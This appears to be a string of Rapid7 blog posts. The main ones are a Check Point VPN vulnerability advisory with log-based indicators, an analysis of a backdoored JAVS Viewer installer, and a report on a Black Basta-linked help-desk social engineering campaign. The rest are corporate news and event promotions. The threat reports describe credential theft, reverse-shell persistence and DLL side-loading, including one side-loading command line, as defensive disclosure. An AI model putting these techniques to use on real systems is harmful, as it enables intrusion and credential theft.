Notably, the vendor advisory now calls out a non-default “CCCD” feature, stating “Customers who use CCCD must disable this functionality for the Hotfix to be effective.” All organizations should manually confirm that the CCCD feature is disabled on every patched Check Point device. Per the vendor advisory, the command vpn cccd status should be executed in “Expert Mode” on appliances to confirm that CCCD is disabled.

The vendor supplied hotfixes should be applied immediately. Rapid7 strongly recommends that Check Point Security Gateway customers examine their environments for signs of compromise and reset local account credentials in addition to applying vendor-provided fixes.

Check Point notes that exploit attempts their team has observed “focus on remote access scenarios with old local accounts with unrecommended password-only authentication.” The company recommends that customers check for local account usage, disable any unused local accounts, and add certificate-based authentication rather than password-only authentication. More information and recommendations on user and client authentication for remote access is available here.

IOCs

No reliable method of identifying arbitrary file read exploitation was identified. However, successful web administration panel and SSH logins will be logged in /var/log/messages, /var/log/audit/audit.log, and /var/log/auth.

Contents of /var/log/audit/audit.log after web administration panel login as the user ‘admin’ from ‘192.168.181.1’ with local PAM authentication:
type=USER_AUTH msg=audit(1717085193.706:656): pid=65484 uid=99 auid=4294967295 ses=4294967295 subj=kernel msg='op=PAM:authentication grantors=pam_dof_tally,cp_pam_tally,pam_unix acct="admin" exe="/usr/sbin/httpauth" hostname=192.168.181.1 addr=192.168.181.1 terminal=? res=success'

Contents of /var/log/messages after web administration panel login as the user ‘admin’ from ‘192.168.181.1’ with local PAM authentication:
May 30 08:30:25 2024 gw-6f7361 httpd2: HTTP login from 192.168.181.1 as admin

Contents of /var/log/auth after web administration panel login as the user ‘admin’ from ‘192.168.181.1’ with local PAM authentication:
May 30 08:30:31 2024 gw-6f7361 httpd2: HTTP login from 192.168.181.1 as admin

Contents of /var/log/messages after SSH login as the user ‘admin’ from ‘192.168.181.1’ with local PAM authentication:
May 30 08:34:24 2024 gw-6f7361 xpand[176227]: admin localhost t +volatile:clish:admin:66699 t
May 30 08:34:24 2024 gw-6f7361 xpand[176227]: User admin logged in with ReadWrite permission

Contents of /var/log/secure after SSH login as the user ‘admin’ from ‘192.168.181.1’ with local PAM authentication:
May 30 08:30:31 2024 gw-6f7361 sshd[66690]: Accepted password for admin from 192.168.181.1 port 62487 ssh2

Rapid7 Customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2024-24919 with an unauthenticated vulnerability check shipping in today's (Thursday, May 30) content release.

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on post-exploitation behavior related to this vulnerability:

• Suspicious Web Server Request - Successful Path Traversal Attack
• Suspicious Web Request - Possible Check Point VPN (CVE-2024-24919) Exploitation

Updates

May 30, 2024: Added IOC section. CVE-2024-24919 has been added to the U.S. Cybersecurity and Infrastructure Agency's (CISA) Known Exploited Vulnerabilities (KEV) list on May 30, 2024.

May 31, 2024: Added updated Check Point advisory that has revealed that the first exploitation attempts actually began on April 7, 2024, and not April 30 as previously thought.

June 3, 2024: Updated the Mitigation Section with new information from Check Point's updated advisory on the CCCD feature that is disabled by default. It must be disabled for the Hotfix to be effective on some versions of the software.

We are thrilled to announce that two of our exceptional team members, Joanne Guariglia and Kelly Hiscoe, have been recognized as CRN's 2024 Women of the Channel. This recognition celebrates the achievements and leadership of women within the channel community, and we are incredibly proud to see Joanne and Kelly honored for their contributions.

Kelly Hiscoe: Driving innovation in partner programs

Kelly Hiscoe and her team are at the forefront of designing and launching partner programs, optimizing our operations to support Rapid7's global channel ecosystem. Their commitment to creating highly effective and streamlined partner experiences ensures seamless execution within our channel. Engaging continuously with partners, Kelly's team drives simplified, scalable, and predictable experiences that benefit all stakeholders.

Kelly's dedication to improving our operational infrastructure and incentive programs is unwavering. Kelly said: "We will never be done focusing on creating improved programs and processes. We will continue to be laser focused on enhancing our operational infrastructure and incentive programs because we care deeply about the partner experience with Rapid7."

Her leadership and vision are integral to our ongoing success and the satisfaction of our partners.

Joanne Guariglia: Building lasting relationships

Joanne Guariglia has demonstrated exceptional skill in building and nurturing lasting relationships with our partners, an area in which Rapid7 are investing heavily -  making strides with the channel community more than ever.

"What I enjoy most is being able to build lasting relationships with our partners. Partners want to work with trusted brands who are leaders in the space, and we have that here at Rapid7. Being that trusted voice and growing the relationship, while educating them about our offerings, enables me to have a positive impact," Joanne said.

Her dedication to partner success and her ability to educate and inform are key components of her impactful work.

Commitment to excellence

At Rapid7, we are committed to fostering an environment where talented individuals like Joanne and Kelly can thrive. Their recognition as CRN's 2024 Women of the Channel underscores our dedication to excellence and our focus on building a strong, supportive channel ecosystem. We look forward to their continued contributions and to the ongoing success of our partners.

Please join us in celebrating Joanne and Kelly for their outstanding achievements and their unwavering commitment to excellence in the channel community.

Learn more about Rapid7 global partnerships here.

*The following Rapid7 team members contributed to this blog: Ipek Solak, Thomas Elkins, Evan McCann, Matthew Smith, Jake McMahon, Tyler McGraw, Ryan Emmons, Stephen Fewer, and John Fenninger*

Overview

Justice AV Solutions (JAVS) is a U.S.-based company specializing in digital audio-visual recording solutions for courtroom environments. According to the vendor’s website, JAVS technologies are used in courtrooms, chambers and jury rooms, jail and prison facilities, and council, hearing, and lecture rooms. Their company website cites over 10,000 installations of their technologies worldwide.

Rapid7 has determined that users with JAVS Viewer v8.3.7 installed are at high risk and should take immediate action. This version contains a backdoored installer that allows attackers to gain full control of affected systems. Completely re-imaging affected endpoints and resetting associated credentials is critical to ensure attackers have not persisted through backdoors or stolen credentials. Users should install the latest version of JAVS Viewer (8.3.8 or higher) after re-imaging affected systems. These findings were identified through an investigation performed by Rapid7 analysts.

On Friday, May 10, 2024, Rapid7 initiated an investigation into an incident involving the execution of a binary named fffmpeg.exe from within the file path C:\Program Files (x86)\JAVS\Viewer 8\. The investigation traced the infection back to the download of a binary named JAVS Viewer Setup 8.3.7.250-1.exe that was downloaded from the official JAVS site on March 5th. Analysis of the installer JAVS Viewer Setup 8.3.7.250-1.exe showed that it was signed with an unexpected Authenticode signature and contained the binary fffmpeg.exe. During the investigation, Rapid7 observed encoded PowerShell scripts being executed by the binary fffmpeg.exe.

Based on open-source intelligence, Rapid7 determined that the binary fffmpeg.exe is associated with the GateDoor/Rustdoor family of malware discovered by researchers at security firm S2W.

Note: CVE-2024-4978 has been added to the U.S. Cybersecurity and Infrastructure Security's (CISA) Known Exploited Vulnerabilities (KEV) list as of May 29, 2024.

Product Description

JAVS Suite 8 is a portfolio of audio/video recording, viewing, and management software for government organizations and businesses. The affected “JAVS Viewer” software is designed to open media and log files created by other pieces of JAVS Suite software. It is available to download via the vendor's website, and it’s shipped as a Windows-based installer package that prompts for high privileges upon execution.

Credit

This issue was discovered and documented by Ipek Solak, Detection and Response Analyst at Rapid7. Rapid7 is grateful to the U.S. Cybersecurity and Infrastructure Security Agency (CISA) for their prompt assistance coordinating disclosure of this issue, and to Justice AV Solutions for their quick response.

A full vendor statement from Justice AV Solutions is available at the end of this blog and includes information about the actions JAVS has taken.

You can find Rapid7’s coordinated disclosure policy here.

Rapid7-Observed Attacker Behavior

The malicious Windows installer JAVS.Viewer8.Setup_8.3.7.250-1.exe contains an unexpected binary file fffmpeg.exe (1.4 MB, SHA1: e41ec15f2bac76914b4a86cade3a0f4619167f52). Note the three f characters in the binary name; the expected ffmpeg.exe binary only has two f characters.

Searching VirusTotal for this binary’s SHA1 reveals that several vendors classify this binary as a malicious dropper:

Figure 1 - The Dropper’s VirusTotal Details

VirusTotal reports this binary was first seen on the VT platform May 3, 2024.

Both the fffmpeg.exe binary and the installer binary are signed by an Authenticode certificate issued to “Vanguard Tech Limited”. This is unexpected, as it was noted that other JAVS binaries which appear legitimate are signed by a certificate issued to “Justice AV Solutions Inc”. Searching VirusTotal for other files signed by “Vanguard Tech Limited” shows the following.

Figure 2- VirusTotal Vanguard Certificate Results

The above suggests that there may be one other version of the malicious installer (SHA1: b8e97333fc1b5cd29a71299a8f82a541cabf4d59) and one other malicious fffmpeg.exe (SHA1: b9d13055766d792abaf1d11f18c6ee7618155a0e). These binaries were first seen on the VirusTotal platform April 1, 2024.

The Windows Installer file (b8e97333fc1b5cd29a71299a8f82a541cabf4d59) contains multiple bundled files, including a file called Dll2.dll (SHA1: cd60955033d1da273a3fda61f69d76f6271e7e4c). The file contains a string called “HelloWorld” and from the execution path perspective, this looks like a test. From an OPSEC point of view, the file was not ‘cleaned’ but contains the compilation information, in this case the full PDB path: C:\Users\User\source\repos\Dll2\x64\Debug\Dll2.pdb

Exploitation Timeline

• Feb 10, 2024: A certificate is issued for the subject Vanguard Tech Limited, which the certificate indicates is based in London.
• Feb 21, 2024: The first of the two malicious JAVS Viewer packages is signed with the Vanguard certificate.
• April 2, 2024: The Twitter user @2RunJack2 tweets about malware being served by the official JAVS downloads page. It’s not stated whether the vendor was notified.
• Mar 12, 2024: The second of the two malicious JAVS Viewer packages is signed with the Vanguard certificate.
• May 10, 2024: Rapid7 investigates a new alert in a Managed Detection and Response customer environment. The source of the infection is traced back to an installer that was downloaded from the official JAVS site. The malware file that was downloaded by the victim, the first Viewer package, is not observed to be accessible on the vendor’s download page. It’s unknown who removed the malicious package from the downloads page (i.e., the vendor or the threat actor).
• May 12, 2024: Rapid7 discovers three additional malicious payloads being hosted on the threat actor’s C2 infrastructure over port 8000: chrome_installer.exe, firefox_updater.exe, and OneDriveStandaloneUpdater.exe.
• May 13, 2024: Rapid7 identifies an unlinked installer file containing malware, the second Viewer package, still being served by the official vendor site. This confirms that the vendor site was the source of the initial infection.
• May 17, 2024: Rapid7 discovers that the threat actor removed the binary OneDriveStandaloneUpdater.exe from C2 infrastructure and replaced it with a new binary, ChromeDiscovery.exe. This indicates that the threat actor is actively updating their C2 infrastructure.

Impact

During Rapid7’s initial examination of the binary fffmpeg.exe, it became evident that the program facilitates unauthorized remote access. Upon execution, fffmpeg.exe persistently communicates with a command-and-control (C2) server using Windows sockets and WinHTTP requests. Once successfully connected, fffmpeg.exe transmits data about the compromised host, including hostname, operating system details, processor architecture, program working directory and the user name to the C2.

Figure 3 - Sample Network Traffic Containing Information About the Host

Subsequently, a persistent connection is established, with the binary poised to receive commands from the C2.

While investigating an incident regarding the binary fffmpeg.exe, Rapid7 observed the execution of two obfuscated PowerShell scripts.

Figure 4 - Encoded PowerShell Script Spawned by fffmpeg.exe

Rapid7 deobfuscated the PowerShell scripts executed by fffmpeg.exe and determined the script will attempt to bypass the Anti-Malware Scan Interface (AMSI) and disable Event Tracing for Windows (ETW) for the launched PowerShell session, before executing a command to download an additional payload.

Figure 5 - De-obfuscated PowerShell Script Spawned by fffmpeg.exe

During analysis of chrome_installer.exe, Rapid7 observed that the binary contained code to drop Python scripts and a binary named main.exe within the Temp folder, passing the string {TEMP}\\onefile_{PID}_{TIME} as an argument to a function whose responsibility was to build out the file path.

Figure 6 - Temp Folder Creation Using String {TEMP}\onefile_{PID}_{TIME}

Once the new software was dropped, chrome_installer.exe was responsible for executing the binary main.exe using the function CreateProcessW. After analysis of main.exe, Rapid7 observed that it contained compiled Python code within the resource section whose purpose was to scrape browsers’ credentials. We also observed that main.exe was compiled using Nuitka, a Python program designed to compile Python scripts into standalone executables. During the investigation, Rapid7 observed that main.exe did not execute properly, indicating an issue in the original source code.

Figure 7 - Code References to Nuitka

IOCs

Identified by Open Source Intelligence (OSINT)

Remediation

Users who have version 8.3.7 of the JAVS Viewer executable installed are at high risk and should take immediate action. This version contains a backdoored installer that allows attackers to gain full control of affected systems.

To remediate this issue, affected users should:

• Reimage any endpoints where JAVS Viewer 8.3.7 was installed. Simply uninstalling the software is insufficient, as attackers may have implanted additional backdoors or malware. Re-imaging provides a clean slate.
• Reset credentials for any accounts that were logged into affected endpoints. This includes local accounts on the endpoint itself as well as any remote accounts accessed during the period when JAVS Viewer 8.3.7 was installed. Attackers may have stolen credentials from compromised systems.
• Reset credentials used in web browsers on affected endpoints. Browser sessions may have been hijacked to steal cookies, stored passwords, or other sensitive information.
• Install the latest version of JAVS Viewer (8.3.8 or higher) after re-imaging affected systems. The new version does not contain the backdoor present in 8.3.7.

Completely re-imaging affected endpoints and resetting associated credentials is critical to ensure attackers have not persisted through backdoors or stolen credentials. All organizations running JAVS Viewer 8.3.7 should take these steps immediately to address the compromise.

Rapid7 Customers

InsightIDR, Managed Detection and Response, and Managed Threat Complete customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to this activity:

• Suspicious Process - Execution From Root of ProgramData
• Attacker Technique - PowerShell Registry Cradle
• PowerShell - Obfuscated Script
• Attacker Technique - PowerShell Download Cradles
• Attacker Technique - PowerShell Backtick Obfuscation
• Backdoor - Potential JAVS Backdoor

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2024-4978 with a vulnerability check expected to be available in today’s (Thursday, May 23) content release.

Vendor Statement

Justice AV Solutions provided the following statement to Rapid7 on Wednesday, May 22, 2024. According to JAVS:

“Justice AV Solutions (JAVS) is committed to providing our clients with secure and reliable software solutions. We recently identified a potential security issue with a previous version of our JAVS Viewer software (Version 8.3.7).

Through ongoing monitoring and collaboration with cyber authorities, we identified attempts to replace our Viewer 8.3.7 software with a compromised file. We pulled all versions of Viewer 8.3.7 from the JAVS website, reset all passwords, and conducted a full internal audit of all JAVS systems. We confirmed all currently available files on the JAVS.com website are genuine and malware-free. We further verified that no JAVS Source code, certificates, systems, or other software releases were compromised in this incident.

The file in question did not originate from JAVS or any 3rd party associated with JAVS. We highly encourage all users to verify that JAVS has digitally signed any JAVS software they install. Any files found signed by other parties should be considered suspect. We are revisiting our release process to strengthen file certification. We strongly suggest that customers keep updated with all software releases and security patches and use robust security measures, such as firewalls and malware protection.

JAVS service technicians typically install the Viewer software in question. We have all members of our service team validating installations of Viewer software on any potentially affected systems, specifically checking for the presence of the malicious file in question - fffmpeg.exe with three “f’s.” Note, the JAVS file ffmpeg.exe with two “f’s” is a legitimate file.

What You Should Do:
Manually check for file fffmeg.exe: If the malicious file is found or detected, we recommend a full re-image of the PC and a reset of any credentials used by the user on that computer. If Viewer 8.3.7.250 is the version currently installed, but no malicious files are found, we advise uninstalling the Viewer software and performing a full Anti-Virus/malware scan. Please reset any passwords used on the affected system before upgrading to a newer version of Viewer 8.

Upgrade Your JAVS Viewer: We strongly recommend that all users of JAVS Viewer software upgrade to the latest version (Version 8.3.9 or higher). Upgrading is simple and can be completed by following the instructions included in the software update notification or by visiting our website at https://www.javs.com/downloads/

We appreciate your understanding and cooperation in maintaining a secure environment for all our users. If you have any questions or concerns, please do not hesitate to contact our support team at 1-877-JAVSHLP (877-528-7457).

Sincerely,
The Justice AV Solutions Security Team”

Today, during our Take Command Summit, we released our 2024 Attack Intelligence Report, which pulls in expertise from our researchers, our detection and response teams, and threat intelligence teams. The result is the clearest picture yet of the expanding attack surface and the threats security professionals face every day.

Since the end of 2020, we’ve seen a significant increase in zero-day exploitation, ransomware attacks, and mass compromise incidents impacting many organizations worldwide. We have seen changes in adversary behaviors with ransomware groups and state-sponsored threat actors using novel persistence mechanisms and zero-day exploits to great effect.

Our 2024 Attack Intelligence Report is a 14-month look at data for marquee vulnerabilities and attack patterns. From it, we identified trends that are helpful for every security professional to understand.

Some key findings include:

A consistently high level of  zero-day exploitation over the last three years. Since 2020, our vulnerability research team has tracked both scale and speed of exploitation. For two of the last three years, more mass compromise events have arisen from zero-day exploits than from n-day exploits. 53% of widely exploited CVEs in 2023 and early 2024 started as zero-day attacks.  

Network edge device exploitation has increased. Large-scale compromises stemming from network edge device exploitation has nearly doubled in 2023. We found that 36% of the widely exploited vulnerabilities we tracked occurred within network edge technology. Of those, 60% were zero day exploits. These technologies represent a weak spot in our collective defenses.

Ransomware is still big business. We tracked more than 5,600 ransomware attacks between January 2023 and February 2024. And those are the attacks we know about, as many attacks may go unreported for a number of reasons. The ones we were able to track indicated trends in attacker motive and behavior. For instance, we saw an increase in what we term “smash-and-grab” attacks, particularly those involving file transfer solutions. A smash-and-grab attack sees adversaries gaining access to sensitive data and performing exfiltration as quickly as possible. While most ransomware incidents Rapid7 observed were still “traditional” attacks where data was encrypted, smash-and-grab extortion is becoming more common.

Attackers are preferring to exploit simple vulnerability classes. While attackers still target tougher-to-exploit vuln classes like memory corruption, most of the widely exploited CVEs we have tracked over the last few years have arisen from simpler root causes. For instance, 75% of widespread threat CVEs Rapid7 has analyzed since 2020 have improper access control issues, like remotely accessible APIs and authentication bypasses, and injection flaws (like OS command injection) as their root causes.

These are just a few of the key findings in our 2024 Attack Intelligence report. The report was released today in conjunction with our Take Command Summit — a day-long virtual cybersecurity summit, of which the report features as a keynote. The summit includes some of the most impactful members of the security community taking part in some of the most critical conversations at this critical time. You can read the report here.

In just a few short days, some of the best minds in cybersecurity will come together at Take Command to discuss the most pressing challenges and opportunities we face as an industry. The sessions include in-depth discussions on attacker trends and behaviors, a look into the Rapid7 SOC, top guest speakers with unique insights into the cybersecurity landscape, and, of course, a healthy helping of Rapid7’s own expert team.

To whet the whistle ahead of Tuesday’s discussion, we’ve reached out to some of our speakers for insights around what the Take Command Summit will offer.

For the security practitioners:

We asked our team members what they think security practitioners will take away from the summit. Jeffrey Gardner, Field CTO for the Americas talked about bringing best practices to the forefront and acting as a guide with years of experience to share.

“They will learn proven strategies on how to address issues all practitioners and security leaders face as well as insights that were learned through years of experience.”

Devin Krugly, a Strategic Security Advisor at Rapid7 echoed this sentiment with a more in-the-thick-of-it approach.

“Security pros will learn how to better prepare for the inevitable and learn from a SoC team that sees a far greater variety of threats and bad actors than any one company’s team of analysts.”

For the team leaders and decision makers:

Understanding how to lead a team of security practitioners during an era of almost constant change is no small feat. CISOs and other leaders face a constantly shifting security landscape and the need to create cohesive strategies to combat often nebulous adversaries.

Eddy Bobritsky, a Senior Director of Product Management talked about building those strategies by focusing efforts where they are most effective.

“These sessions will help CISOs to build an adaptive strategy focusing on some key elements and approaches at before, during and after the attack phases. They will learn that it is not always about faster detection but rather about reducing attack surface and investing in prevention and it will give them an idea on how to leverage MDR to help them to execute on this strategy.”

There is more than one critical component to leading a team and Sophia Dozier, Director of Diversity, Equity, and Inclusion at Rapid7 explained the benefits of having diverse viewpoints and experiences on the team.

“They [leaders] will understand how weaving principles of DEI into your company's processes provides a unique advantage over those that do not prioritize building multi-dimensional organizations. Actively embracing diversity and working to reflect the global markets that leverage your product, affords companies access to a wealth of knowledge and insight that contributes to their resilience and therefore long-term success.”

For the researchers and the security community:

There is a sentiment in the security community that rings true regardless of where in the chain of command one sits: know your adversary. For this, research and a community of thoughtful security professionals sharing information is absolutely essential.

Jeffrey Gardner, our Field CTO from earlier summed it up well by pointing out how understanding how your adversary is operating right now will help teams determine the most effective places to put their resources.

“Security researchers will learn the newest attack trends and statistics, thus enabling them to better prioritize their research efforts and spread understanding throughout the communities they are involved with.”

Devin Krugly shared a similar thought but couldn’t help but throw in some love for how Rapid7 is constantly and consistently using our world-class research teams to stay ahead of our adversaries.

“They will get a new perspective on attack trends, threat actor group tactics, and information on how Rapid7 is innovating to meet these challenges head on!”

These are just a few of the insights and perspectives you will receive from the Rapid7 Take Command Summit. If you haven’t registered yet, you can do so here. We hope you will join us on May 21 but if you miss it, have no fear, you can view the entire day’s programming on-demand after the fact.

Co-authored by Rapid7 analysts Tyler McGraw, Thomas Elkins, and Evan McCann

Executive Summary

Rapid7 has identified an ongoing social engineering campaign that has been targeting multiple managed detection and response (MDR) customers. The incident involves a threat actor overwhelming a user's email with junk and calling the user, offering assistance. The threat actor prompts impacted users to download remote monitoring and management software like AnyDesk or utilize Microsoft's built-in Quick Assist feature in order to establish a remote connection. Once a remote connection has been established, the threat actor moves to download payloads from their infrastructure in order to harvest the impacted users credentials and maintain persistence on the impacted users asset.

In one incident, Rapid7 observed the threat actor deploying Cobalt Strike beacons to other assets within the compromised network. While ransomware deployment was not observed in any of the cases Rapid7 responded to, the indicators of compromise we observed were previously linked with the Black Basta ransomware operators based on OSINT and other incident response engagements handled by Rapid7.

Overview

Since late April 2024, Rapid7 identified multiple cases of a novel social engineering campaign. The attacks begin with a group of users in the target environment receiving a large volume of spam emails. In all observed cases, the spam was significant enough to overwhelm the email protection solutions in place and arrived in the user’s inbox. Rapid7 determined many of the emails themselves were not malicious, but rather consisted of newsletter sign-up confirmation emails from numerous legitimate organizations across the world.

With the emails sent, and the impacted users struggling to handle the volume of the spam, the threat actor then began to cycle through calling impacted users posing as a member of their organization’s IT team reaching out to offer support for their email issues. For each user they called, the threat actor attempted to socially engineer the user into providing remote access to their computer through the use of legitimate remote monitoring and management solutions. In all observed cases, Rapid7 determined initial access was facilitated by either the download and execution of the commonly abused RMM solution AnyDesk, or the built-in Windows remote support utility Quick Assist.

In the event the threat actor’s social engineering attempts were unsuccessful in getting a user to provide remote access, Rapid7 observed they immediately moved on to another user who had been targeted with their mass spam emails.

Once the threat actor successfully gains access to a user’s computer, they begin executing a series of batch scripts, presented to the user as updates, likely in an attempt to appear more legitimate and evade suspicion. The first batch script executed by the threat actor typically verifies connectivity to their command and control (C2) server and then downloads a zip archive containing a legitimate copy of OpenSSH for Windows (ultimately renamed to ***RuntimeBroker.exe***), along with its dependencies, several RSA keys, and other Secure Shell (SSH) configuration files. SSH is a protocol used to securely send commands to remote computers over the internet. While there are hard-coded C2 servers in many of the batch scripts, some are written so the C2 server and listening port can be specified on the command line as an override.

The script then establishes persistence via run key entries  in the Windows registry. The run keys created by the batch script point to additional batch scripts that are created at run time. Each batch script pointed to by the run keys executes SSH via PowerShell in an infinite loop to attempt to establish a reverse shell connection to the specified C2 server using the downloaded RSA private key. Rapid7 observed several different variations of the batch scripts used by the threat actor, some of which also conditionally establish persistence using other remote monitoring and management solutions, including NetSupport and ScreenConnect.

In all observed cases, Rapid7 has identified the usage of a batch script to harvest the victim’s credentials from the command line using PowerShell. The credentials are gathered under the false context of the “update” requiring the user to log in. In most of the observed batch script variations, the credentials are immediately exfiltrated to the threat actor’s server via a Secure Copy command (SCP). In at least one other observed script variant, credentials are saved to an archive and must be manually retrieved.

In one observed case, once the initial compromise was completed, the threat actor then attempted to move laterally throughout the environment via SMB using Impacket, and ultimately failed to deploy Cobalt Strike despite several attempts. While Rapid7 did not observe successful data exfiltration or ransomware deployment in any of our investigations, the indicators of compromise found via forensic analysis conducted by Rapid7 are consistent with the Black Basta ransomware group based on internal and open source intelligence.

Forensic Analysis

In one incident, Rapid7 observed the threat actor attempting to deploy additional remote monitoring and management tools including ScreenConnect and the NetSupport remote access trojan (RAT). Rapid7 acquired the Client32.ini file, which holds the configuration data for the NetSupport RAT, including domains for the connection. Rapid7 observed the NetSupport RAT attempt communication with the following domains:

• rewilivak13[.]com
• greekpool[.]com

After successfully gaining access to the compromised asset, Rapid7 observed the threat actor attempting to deploy Cobalt Strike beacons, disguised as a legitimate Dynamic Link Library (DLL) named 7z.DLL, to other assets within the same network as the compromised asset using the Impacket toolset.

In our analysis of 7z.DLL, Rapid7 observed the DLL was altered to include a function whose purpose was to XOR-decrypt the Cobalt Strike beacon using a hard-coded key and then execute the beacon.

The threat actor would attempt to deploy the Cobalt Strike beacon by executing the legitimate binary 7zG.exe and passing a command line argument of `b`, i.e. `C:\Users\Public\7zG.exe b`. By doing so, the legitimate binary 7zG.exe side-loads 7z.DLL, which in turn executes the embedded Cobalt Strike beacon. This technique is known as DLL side-loading, a method Rapid7 previously discussed in a blog post on the IDAT Loader.

Upon successful execution, Rapid7 observed the beacon inject a newly created process, choice.exe.

Mitigations

Rapid7 recommends baselining your environment for all installed remote monitoring and management solutions and utilizing application allowlisting solutions, such as AppLocker or ​​Microsoft Defender Application Control, to block all unapproved RMM solutions from executing within the environment. For example, the Quick Assist tool, quickassist.exe, can be blocked from execution via AppLocker.  As an additional precaution, Rapid7 recommends blocking domains associated with all unapproved RMM solutions. A public GitHub repo containing a catalog of RMM solutions, their binary names, and associated domains can be found here.

Rapid7 recommends ensuring users are aware of established IT channels and communication methods to identify and prevent common social engineering attacks. We also recommend ensuring users are empowered to report suspicious phone calls and texts purporting to be from internal IT staff.

MITRE ATT&CK Techniques

Rapid7 Customers

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to this malware campaign:

Indicators of Compromise

Network Based Indicators (NBIs)

Host-based indicators (HBIs)

The effort aims to help close gender and racial pay gaps

Rapid7 is proud to announce their signing of the 100% Talent Compact through the Boston Women’s Workforce Council (BWWC). The Talent Compact is a collective effort among the Boston Mayor and local employers to close the gender and racial wage gaps in Greater Boston. Compact Signers are actively committed to examining their salary data, contributing that data anonymously to the BWWC’s biennial wage-gap measurement, and participating in quarterly briefing sessions.

As an organization, the BWWC works alongside the City of Boston’s Mayor as well as local employers. Their programs and initiatives reflect their core beliefs surrounding the positive impact women have on businesses and communities, the importance of addressing gender and racial pay inequities, and the systemic impact gender and racial pay disparities can have in Greater Boston.

As stated by Christina Luconi, Chief People Officer, “At Rapid7, we are committed to fostering an environment where all of our people are doing impactful work in a way that is meaningful to them. Ensuring that we have equitable salary practices is just one way we can ensure everyone has the opportunity to thrive in their career.”

In the United States, women earn 84 cents for every dollar earned by a man. In Boston, data collected by participants of the Talent Compact shows consistency with this number, with a wage gap of $0.21 for women and a gap of $0.27 for employees of color.

According to Lauren Noonan, Engagement Manager with the BWWC, “These numbers are disappointing to see, but measuring this data and understanding the work that needs to be done is the first critical step to creating necessary change. The companies that have signed on to our Talent Compact are committed to taking active roles in identifying gaps within their own organizations and actively participating in the panel discussions, sharing ideas, and putting corrective plans into action to address them.”

When it comes to diversity, equity and inclusion (DEI), Rapid7 has consistently demonstrated a commitment to focus efforts on driving impact; whether it’s through similar strategic partnerships with organizations like Hack.Diversity, Cyversity, and the University of South Florida or developing in-house resources and programs. Addressing systemic hurdles and supporting historically marginalized communities have become an integral part of our business strategy.

In addition to having programs and partnerships in place, Rapid7’s Director of Diversity, Equity and Inclusion, Sophia Dozier stresses how transparency is critical for creating impact and success. “Transparency is a key pillar in fostering spaces that are not only diverse and inclusive, but truly equitable. Levers of transparency should be embedded into every DEI strategy, as it helps ensure that decisions continue to reflect commitments made in support of building and maintaining impactful, high-performing, multi-dimensional teams and organizations.”

At Rapid7, we believe we are truly #NeverDone in our efforts to build an inclusive and equitable workplace where our employees can develop the career experience of a lifetime. This partnership furthers our commitment to continuously examining and enhancing our practices and programs so that all people can thrive, while being part of a greater discussion that impacts our industry and local community.

The Rapid7 Take Command Summit is just two short weeks away. We’re busy putting together one of the most impactful programs on the latest in cybersecurity trends, technology, and innovations available, and we are eager to share it with all of you.

So eager, in fact, that Chairman and CEO of Rapid7, Corey Thomas, has a special message to share.

You can view the message (and register for the event) here.

The Take Command Summit is a chance to hear from industry leaders on up-to-the minute security research, trends, and intelligence; from ransomware and state-sponsored threats, to the marquee vulnerabilities making headlines around the globe.

At Take Command you will receive a glimpse into our elite security operations center (SOC); and understand the best ways to show your organization’s leadership how a robust security operation can actually improve your ROI. We will share our approach to building a world-class SOC with partners who truly understand your needs and what makes your security operations unique.

All of this is in service of what we call commanding the attack surface. It’s best expressed in our effort to anticipate, pinpoint, and act on imminent and active threats across your entire security ecosystem and foster a cultural shift that empowers every member of your organization to help keep your networks secure.

We think this is a critical conversation at a critical moment. We hope to see you there.

By now you should have heard about Take Command, Rapid7’s day-long virtual summit on May 21 bringing together some of the best minds in the cybersecurity sphere for comprehensive discussions on the latest data, challenges, and opportunities in the industry. It’s an opportunity to expand your understanding of the state of play right from the comfort of your own home (or office, or home office).

Our agenda is pretty all-encompassing. We will have sessions on cutting edge tools designed to keep your networks safe and brand new data on attacker behaviors from our Rapid7 Labs team. But the highlights don’t stop there. We will take you through the Rapid7 always-on global SOC so you can see first-hand how we detect and respond to threats from every angle and get strategies for confronting ransomware, state-sponsored threats, and the major vulnerabilities creating headlines (and headaches).

Here are a few more of the featured sessions:

• Command Your Cloud: Anticipate, Pinpoint, and Act on Cloud Threats: Learn the latest tactics and operational trends for detecting cloud threats and mitigating risks fast.
• Commander-in-Chief: Enhancing Cybersecurity Culture: Effective security is more than a set of tools and tactics, it is an organization-wide mindset. Discover ways to boost awareness, engagement, and proactive behaviors among all employees.
• Ready and Resilient: Before, During, & After Ransomware Attacks: We will explore the entire ransomware lifecycle from an attacker’s perspective: recon, toolkits, misconfigurations, the works.
• Unlocking Security Success: Strategies for Measuring Team Performance and Demonstrating ROI: This session will focus on how to knock those performance and budget conversations out of the park by highlighting data that actually drives momentum.

But wait, there’s more. Take Command is Rapid7’s premier virtual summit so we’ve pulled out all the stops with featured guest speakers.

Andrew Bustamante is a former covert CIA intelligence officer and US Air Force combat veteran turned Fortune 10 corporate advisor. Andrew will join the Take Command Summit for an insightful interview on how dynamic thinking, creative problem solving, and educated risk-taking can elevate your personal and professional life.

Rachel Tobac is the CEO of SocialProof Security, a renowned white hat hacker, and the seemingly perennial winner of DefCon’s Social Engineering Capture the Flag contest (seriously, it was three years in a row). Rachel will talk about how she hacks and the best ways to stop her, standing in for all of the attackers we face daily.

And last but not least, we will have Brian Honan, CEO and Principal Consultant for BHConsulting, on hand to discuss the best practices he has learned over a career in cybersecurity for large companies, multinationals, SMEs, and government agencies.

As you can see, the Take Command agenda and guest list is pretty well stacked, and getting better every day. Tune in here for more details as we get closer to May 21!

And if you haven’t already registered you can do so here. Sign up for whichever sessions you want to see, and if you can’t make them all, they will be available on demand.

Who exactly owns cybersecurity in your organisation?

Authored by Sean Vogelenzang

